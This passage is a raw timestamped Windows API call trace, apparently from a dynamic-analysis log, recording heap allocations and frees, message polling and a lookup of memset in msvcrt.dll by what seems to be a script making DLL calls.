Size=0x10) returned 0x9b9f70 [0164.488] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0164.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0164.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0164.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.489] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0164.491] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.492] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0164.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0164.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0164.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.493] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.494] FreeLibrary (hLibModule=0x75c90000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.495] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.495] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.495] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0164.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.496] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0164.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0164.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 